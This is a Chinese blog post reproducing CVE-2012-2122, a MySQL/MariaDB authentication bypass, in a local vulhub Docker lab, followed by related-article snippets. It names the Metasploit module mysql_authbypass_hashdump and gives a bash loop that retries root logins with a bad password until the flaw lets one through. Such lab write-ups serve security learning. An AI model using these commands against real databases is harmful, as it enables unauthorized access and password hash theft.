数据库漏洞之mysql身份认证绕过

最新推荐文章于 2024-05-29 13:35:56 发布
最新推荐文章于 2024-05-29 13:35:56 发布
阅读量425 收藏
点赞数
分类专栏: 网络安全 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39756628/article/details/116136266
版权

漏洞简介

#:数据库的漏洞较少,大多都是基于弱口令爆破。
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。

受影响版本:
• MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
• MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

启动环境

cd /root/vulhub/mysql/CVE-2012-2122
docker-compose up -d
在这里插入图片描述环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456
在这里插入图片描述

漏洞复现

使用msf扫描模块
use auxiliary/scanner/mysql/mysql_authbypass_hashdump
在这里插入图片描述在这里插入图片描述
或者直接采用下面方式:

for i in seq 1 1000; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
在这里插入图片描述

关闭环境

docker-compose down
在这里插入图片描述

参考链接:

https://www.cnblogs.com/l0nmar/p/13372091.html
https://vulhub.org/#/environments/mysql/CVE-2012-2122/

dddxsr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web安全漏洞——身份验证绕过
m0_61506558的博客
10-11 5267
身份验证绕过是现代web应用程序中普遍存在的问题,但这类漏洞不容易发现。尽管单点登录(SSO)等工具通常是对旧的登录用户方式的改进,但仍然可能包含严重的漏洞。无论是业务逻辑漏洞还是其他软件缺陷,都需要敏锐的眼光来审视。0x01 刷新令牌接口的配置错误在这个漏洞中,用户一旦使用有效凭证登录到应用程序,它就会创建一个在应用程序其他地方使用的承载身份验证令牌。该认证令牌在一段时间后过期。就在过期之前,应用程序从接口。
Nacos身份认证权限绕过+漏洞利用工具分享
hackzkaq的博客
12-27 2789
JSON Web Token (JWT)是一个开放标准(RFC 7519),它定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任,因为它是数字签名的。 在线解密查看内容:
五种不寻常的身份验证绕过技术
2401_84488651的博客
05-29 1318
就在过期之前,应用程序在终端/refresh/tokenlogin中向后端服务器发送了一个请求,该请求在标头和HTTP主体部分的用户名参数中包含有效的身份验证令牌。复杂的身份验证机制可能成为攻击者使用的最具隐蔽性的攻击手段,特别是在容易出现业务逻辑漏洞的应用程序上。进一步的测试表明,删除请求上的Authorization标头并更改HTTP主体上的用户名参数将为提供的用户名创建一个新的有效令牌。乍一看,它似乎是安全的,但对后端请求的分析显示,应用程序在重定向响应上返回了异常大的内容长度(超过40000字节)
身份验证绕过漏洞(CVE-2023-20860)
zkaqlaoniao的博客
10-13 1880
Spring官方发布了Spring Framework 身份认证绕过漏洞(CVE-2023-20860),当Spring Security使用mvcRequestMatcher配置并将**作为匹配模式时,在Spring Security 和 Spring MVC 之间会发生模式不匹配,最终可能导致身份认证绕过
MySQL身份认证绕过漏洞
san3144393495的博客
04-19 168
先在ubtuntu虚拟机中搭建好靶场环境,在kill中进入攻击的模块第一种直接输入图片上的的代码可以直接攻击进去控制面板。出现红线上的就是攻击成功,已经创建了一个文件,这时候只需要进入这个文件然后查看密码表。第二种是远程代码攻击 ,进入攻击模块后 输入要攻击的ip的 输入run开始攻击。然后破解md5面膜,逆运算破译出来就是root用户的密码。MySQL身份认证绕过漏洞
应用CVE: 最新的Mysql高危漏洞介绍
dzqxwzoe的博客
02-20 950
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。影响5.6.38及之前的版本,5.7.19及之前的版本。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。
【认证绕过】NACOS身份认证绕过漏洞分析
m0_61572518的博客
04-12 6688
工作中遇到一个nacos服务认证绕过的问题,在此总结一下漏洞原因。
SQL注入漏洞发现和数据库监控系统.zip
05-27
SQL注入漏洞是网络安全领域中的一个重要话题,它主要发生在应用程序与数据库交互时,由于不恰当的输入验证导致恶意用户能够执行自定义SQL命令。本篇将深入探讨SQL注入漏洞的发现、修补技术和数据库监控系统的应用。 ...
Php mySql注入漏洞分析与研究.pdf
10-10
这种漏洞对网站安全构成严重威胁,因为它允许攻击者绕过正常的权限控制,执行任意SQL命令。 PHP是广泛使用的服务器端脚本语言,常用于构建动态网站,而MySQL则是一种流行的关系型数据库管理系统。当两者结合时,...
由php中字符offset特征造成的绕过漏洞详解
12-20
攻击者可以通过构造特殊的输入来绕过这个验证,利用字符串作为数组的特性。例如,如果管理员的`id`是`1`,攻击者可以首先将自己的密码改为`1`,然后通过`userInfo`参数提交`'id' => 8, 'pass' => '1'`。这将导致SQL...
MySQL数据库渗透及漏洞利用总结
02-25
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但技术的进步有无止境,思想有多远,路就可以走多远,在研究mysql数据库安全之余,对Mysql如何通过msf、sqlmap等来进行扫描、漏洞
后台Union注入绕过验证1
08-08
标题中的“后台Union注入绕过验证1”是指在Web应用程序中,攻击者通过利用SQL注入漏洞,特别是使用UNION查询的方式,绕过系统的身份验证机制。这种攻击手段常见于ASP编程语言构建的网站,因为描述中提到了ASP程序中...
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
WEB 漏洞-SQL 注入之堆叠及 WAF 绕...因此,在 WEB 漏洞-SQL 注入之堆叠及 WAF 绕过注入中,我们需要了解 SQL 注入的原理、数据库的特性、WAF 的策略规则,并学习如何绕过 WAF 防护和对参数进行编码、解码和加密解密。
mysql信息泄露漏洞,MySQL远程信息泄漏和缓冲区溢出漏洞
weixin_29711757的博客
03-17 1005
MySQL远程信息泄漏和缓冲区溢出漏洞2006-05-10eNet&Ciweek3 COM_TABLE_DUMP服务器入侵在sql/sql_base.cc的1090行:TABLE *open_table(THD *thd, TABLE_LIST *table_list, MEM_ROOT *mem_root,bool *refresh, uint flags){reg1 TABLE *ta...
mysql】Oracle MySQL输入验证错误漏洞
热门推荐
掘金者说
09-30 1万+
MySQL Server是其中的一个数据库服务器组件。Oracle MySQL 8.0.29及之前版本存在输入验证错误漏洞,该漏洞源于允许通过多种协议进行网络访问的高权限攻击者破坏MySQL服务器,攻击者利用该漏洞可以导致MySQL Server挂起或崩溃。从项目中查询发现使用数据库Mysql8.0.29,然后根据这个版本去对应安全风险查询是否存在对应漏洞风险,并根据实际需要进行有效的升级。我们可以同步图片中的内容,看到对应表表以及存在一些零件问题,直观的看到对应受影响的受支持版本。
MySQL身份认证绕过漏洞(CVE-2012-2122)
qq115399231的博客
07-16 3384
漏洞介绍 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 这个缺陷的根源在于memcmp()函数总是返回-128到127(有符号字符)范围内的值。也就是说,只有在Linux系统使用SSE优化库(GNU C库)的场合下才能被利用,成功触发这一漏洞的概率约为1:256。 受影响版...
Mysql 身份认证绕过漏洞(CVE-2012-2122)
lonmar的博客
07-24 2664
参考连接: https://www.freebuf.com/vuls/3815.html 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现 受影响版本: MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 ar
[漏洞复现]Mysql 身份认证绕过漏洞(CVE-2012-2122)
Vicl1fe的博客
12-24 3235
mysql身份验证绕过漏洞 出现这个漏洞
mysql 绕过身份雁阵
最新发布
06-20
MySQL绕过身份验证通常指的是尝试未经授权访问MySQL数据库,这通常是非法的并且违反了数据库安全原则。如果遇到这种情况,通常有以下几种可能: 1. **弱密码或默认账户**:检查是否有使用默认或常见密码的用户,这些容易被破解。 2. **未授权的SSH隧道**:如果通过SSH或其他远程访问工具连接MySQL,可能会存在隧道被滥用的情况。 3. **未配置的安全设置**:数据库服务器可能没有正确配置,如允许从所有IP或没有限制的访问。 4. **错误的身份验证机制**:比如在旧版本中可能存在某种漏洞,可通过特定的SQL命令绕过认证。 5. **恶意软件或攻击**:数据库可能受到SQL注入、暴力破解等攻击。 重要的是保持数据库的安全,实践最佳实践,包括但不限于定期更新到最新版本,使用强壮的密码策略,限制对数据库的访问,启用SSL/TLS加密,以及定期审计安全日志。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值